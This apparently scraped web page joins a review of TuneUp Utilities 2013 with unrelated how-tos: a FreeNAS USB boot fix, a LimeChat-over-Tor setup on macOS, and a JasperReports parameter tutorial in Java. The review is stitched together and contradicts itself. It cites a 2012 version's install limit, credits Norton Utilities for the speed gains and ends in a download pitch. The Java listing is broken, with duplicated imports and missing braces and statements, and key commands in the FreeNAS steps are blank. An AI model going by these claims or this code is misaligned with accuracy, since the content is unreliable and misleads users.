Overall, the software does a fine job of revitalizing a worn PC, but the license limitations keep it from reaching the heights of the Editors Choice award-winning.
Getting Started
Compatible with Windows 8, 7, Vista, and XP PCs, TuneUp Utilities 2013 requires just an Internet connection for activating the license and receiving updates. Unlike Iolo System Mechanics 11, the Editors Choice among paid tuneup utilities, TuneUp Utilities 2012 limits you to only three installs.

When you first fire up the program, youre prompted to run a system scan that will dig up registry and defragmentation problems, as well as other issues. Afterward, you can either run the one-click cleanup or go to the Start Center to check out all the features. I went with the latter option.

TuneUp Utilities installation is relatively painless while taking up no more than 80MB of disk space. The program does require you to consent to sharing information about your machine in order to install. This is so TU can send system information to their server and check if there are any recent updates to the software or OS of your computer. Upon installation, 1-Click Maintenance will ask to run. This is the core of the utility. 1-Click will check everything including the registry, registry fragmentation, application shortcuts, Windows and program files, and hard disk fragmentation to find things that could use tidying up. These are some pretty standard protocols. Regular users will be satisfied with the 1-Click Maintenance tool as it is the main tool of TuneUp. After a successful scan, 1-Click will list all of the issues and subsequently list solutions. 

For my main machine, it was mostly registry errors and shortcuts from software testing. Clicking on the issue count will bring up a report of what TU found. From there youll have an option to choose what to ignore or fix. Looking at 500 registry errors and 345 browser items, I got the feeling that TuneUp is not very discriminating about what it labels as a problem. "Anything that can be removed in exchange for performance must go" is the philosophy here. With a click of a button TuneUp will solve all of your problems. Additionally, the utility makes backups just in case something goes horribly wrong -- good practice for whenever you stick your hands in the registry jar.

Aside from 1-Click Maintenance, TuneUp Utilities 2013 also boasts a variety of tools to speed up overall performance. TU can help with optimizing your display/animation settings, removing software, and disabling startup programs. TU also includes a new tool called "Live Optimization." Live Optimization claims to prioritize programs that run in the background and will only dedicate processing power to those applications when they are being used. I saw it running on Adobe Acrobat and IrfanView when those programs were minimized. However, the differences may not be noticeable at first. The majority of the optimizing tools require some effort on your part to customize the settings to your personal usage. Luckily, TuneUp gives you 2 extra modes: "Economy" and "Turbo" to set your optimization to your specific need. 

"Economy" is nice for laptop users looking to maximize their battery life with options similar to the power-saving mode built into Windows. "Turbo" allows you to schedule optimization and cleanup frequency as to not interrupt important moments when you need to squeeze the most power out of your machine. These modes can be switched on the fly. Uninstallation was simple and tidy. TU left few traces on both my Windows 7 and Windows 8 machines after removal, although it did require me to go through Windows Control Panel to uninstall.

Overall, I felt that the utility did what it claims to do and did it well. The test PCs booted up faster with the recommended optimization, which also improved overall responsiveness when launching applications and running programs. It might not make your computer feel brand new but it should improve performance enough to hold the format monster at bay. There are some powerful optimizing tools in TuneUp Utilities that I barely scratched in this review. Intermediate users will enjoy its full functionality but novice users should still be able to get most benefits that TU offers. Take advantage of the 15-day trial and discover how TuneUp Utilities 2013 is a serious contender in the optimizing market.

Start Center has a mostly blue-and-white tabbed interface that highlights five sections: Status & Recommendations, Optimize System, Clean Up Computer, Fix Problems, and Customize Windows. Each tab has several useful, clearly-defined functions that are easy for the layperson to understand. The Status & Recommendations tab, which is the apps default screen, displays the number of problems found under the Fix Problems sub-heading and the Start 1-Click Maintenance button under the Maintain System sub-head. At the bottom of the window is an Optimization Status band that fills as you complete the steps needed to whip your PC into shape. I found it a nice way to stay on top of the maintenance process.

The TuneUp Browser Cleaner quickly and easily protects your privacy by deleting traces left by Internet Explorer, Google Chrome, Opera, Safari, Firefox, and other browsers, while also optimizing browser databases. The improved TuneUp Live Optimization provides performance boosts when you need them by recalling which programs and processes slow down your PC and allowing you switch these to "Standby" mode, with the help of TuneUp Program Deactivator. In addition, TuneUp Process Manager helps you detect resource-hungry applications even faster. The easy-to-understand information on all background processes shows you exactly whats running on your PC. And last, but not least, the new cleaning features raise 1-Click-Maintenance and Automatic Maintenance to a completely new level in PC optimization.
TuneUp Utilities introduces two new tools in this years release: TuneUp Disk Cleaner and TuneUp Browser Cleaner. The former removes left over bits when programs dont cleanly uninstall; the latter removes browser activity from the likes of Internet Explorer, Chrome, Firefox, and 22 other browsers.


TuneUp Uilities 2013 is more than a basic PC clean up application. It also contains many other functions including file backup and recovery, file deletion, Windows customization, and more. Some of the features duplicate native Windows function, but its convenient to have them in one central location.

The Cleanup Process
Clicking Start 1-Click Maintenance launches the system cleaner, which scanned my test bed and displayed numerous of registry problems, broken shortcuts, and other PC problems. Clicking the "Show Details" beneath each problem count took me to a new screen that described problems in everyday language. Clicking the Start 1-Click Maintenance button cleaned up the mess, eliminating all the previously listed problems.


I returned to the home screen after that task was completed, where I noticed that the Optimization Status bar was at 50 percent. Anxious to see it hit 100 percent, I began exploring TuneUp Utilities 2013s other options that freed up disk space and repaired a handful of problems. The application identified 41 programs that potentially should be disabled. I appreciated that TuneUp Utilities 2013 displayed star ratings culled from the applications user base that helped me quickly see which software that I should keep.

Performance Improvements

After running the tests, I used the computer extensively to get a sense of how the app had changed the responsiveness of the machine. Norton Utilities delivered a noticeable performance improvement; the entire OS moved at a snappier pace even with iTunes and Photoshop open. You can download tuneup utilities 2013 here
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HOWTO FreeNAS 8 0 3 RELEASE p1 USB device boot bug fix

The Problem

When I upgraded my FreeNAS to the latest version FreeNAS 8.0.3 RELEASE p1, it refused to boot and stop at the following message.

mountroot> GEOM: da0s1: geometry does not match label (16h,63s != 255h,63s).

GEOM: da0s2: geometry does not match label (16h,63s != 255h,63s).

I typed the following command and it boots fine.


The problem is that I need to type the captioned command on each boot up. How to solve this problem? Yes, I can.

The Solution

After the system is booting up and a menu is displayed. Select "9) Shell" to go to the shell prompt where we can do the following.

Step 1 :

nano /etc/fstab

Change from :

/dev/ufs/FreeNASs1a / ufs ro 1 1

To :

/dev/ufs/FreeNASs1a / ufs rw 1 1

Step 2 :

Then, save and exit the editor. Execute the following command :

mount -a

Step 3 :

Next, open up another file :

nano /boot/loader.conf

Change from :

#Fix booting from USB device bug


To :

#Fix booting from USB device bug


Save and exit the editor. Then reboot. This time, the boot up is much slower than before but it works. Problem solved!

Thats all! See you.
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HOWTO LimeChat with Tor on Mac OS X 10 8 4

Step 1 :

Download and install the LimeChat from Apple Apps Store on you Mac.

Step 2 :

LimeChat >> Preferences >> Interface >> Layout of the main window >> 3 Columns

LimeChat >> Server >> Server Properties >> General >> Network name -- TorifiedFreenode

LimeChat >> Server >> Server Properties >> General >> Server --

LimeChat >> Server >> Server Properties >> General >> Port -- 6667

LimeChat >> Server >> Server Properties >> General >> Nickserv Pasword -- [your SASL password]

LimeChat >> Server >> Server Properties >> General >> Use SASL >> selected

LimeChat >> Server >> Server Properties >> Details >> Proxy >> SOCKS 5 proxy

LimeChat >> Server >> Server Properties >> Details >> Homename >>

LimeChat >> Server >> Server Properties >> Details >> Port >> 9150

LimeChat >> Server >> Server Properties >> On Login >> #infosec-ninjas [add some channels]

Step 3 :

Go to Tor official website to download and install "Tor Browser Bundle for 64-Bit Mac".

Step 4 :

Run "TorBrowser_en-US".

Vidalia Control Panel >> Settings >> Advanced >> Edit current torrc

Append the following :

MapAddress p4fsi4ockecnea7l.onion

Select it and then "Apply selection only" >> OK

Step 5 :

Close LimeChat and Stop Tor as well as close Vidalia Control Panel.

Then restart Vidalia Control Panel and LimeChat. TorBrowser will start up too.

Thats all! See you.

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JasperReports 5 0 tutorial with iReport 5 0 part 2

The part 1 was a comprehensive beginner style  Jasper Reports tutorial. This extends that to demonstrate how to pass parameters via a Map using name/value pairs to the Jasper Reports.

Step 1: Add a new custom parameter named "footerText" to display some value in the page footer section. Right-click on "Parameters" and select "Add Parameter" and then rename it to "footerText" as shown below. Also, note than the Text Field in the page footer is mapped to $P{footerText} by right clicking on the "Text Field" and then select "Edit expression" to select the parameter "footerText" from the list.

Step 2: Compile this to the jrxml file and then you can pass the value for "footerText" via Java as shown below in the Main.java file. Take note of the getParameters( ) method.

package com.mycompany.app.jasper; import java.io.IOException; import java.io.InputStream; import java.util.Collection; import java.util.LinkedList; import java.util.List; import net.sf.jasperreports.engine.JRException; import net.sf.jasperreports.engine.JasperCompileManager; import net.sf.jasperreports.engine.JasperFillManager; import net.sf.jasperreports.engine.JasperPrint; import net.sf.jasperreports.engine.JasperReport; import net.sf.jasperreports.engine.data.JRBeanCollectionDataSource; import net.sf.jasperreports.engine.design.JasperDesign; import net.sf.jasperreports.engine.xml.JRXmlLoader;
package com.mycompany.app.jasper;

import java.io.IOException;
import java.io.InputStream;
import java.util.Collection;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;

import net.sf.jasperreports.engine.JRException;
import net.sf.jasperreports.engine.JasperCompileManager;
import net.sf.jasperreports.engine.JasperFillManager;
import net.sf.jasperreports.engine.JasperPrint;
import net.sf.jasperreports.engine.JasperReport;
import net.sf.jasperreports.engine.data.JRBeanCollectionDataSource;
import net.sf.jasperreports.engine.design.JasperDesign;
import net.sf.jasperreports.engine.xml.JRXmlLoader;
import net.sf.jasperreports.view.JasperViewer;

public class Main

public static JasperDesign jasperDesign;
public static JasperPrint jasperPrint;
public static JasperReport jasperReport;
public static String reportTemplateUrl = "person-template.jrxml";

public static void main(String[] args) throws IOException
InputStream resourceAsStream = Thread.currentThread().getContextClassLoader()
//get report file and then load into jasperDesign
jasperDesign = JRXmlLoader.load(resourceAsStream);
//compile the jasperDesign
jasperReport = JasperCompileManager.compileReport(jasperDesign);
//fill the ready report with data and parameter
jasperPrint = JasperFillManager.fillReport(jasperReport, getParameters(),
new JRBeanCollectionDataSource(
//view the report using JasperViewer
catch (JRException e)

private static Collection findReportData()
//declare a list of object
List<Person> data = new LinkedList<Person>();
Person p1 = new Person();
return data;

private static Map<String, Object> getParameters()
Map<String, Object> params = new HashMap<String, Object>();
params.put("footerText", "Just to demonstrate how to pass parameters to report");
return params;


Step 3: Finally, run the Main.java to see the value "Just to demonstrate how to pass parameters to report" in the report footer. The parameters are handy to pass any arbitary name/value pairs to the report.

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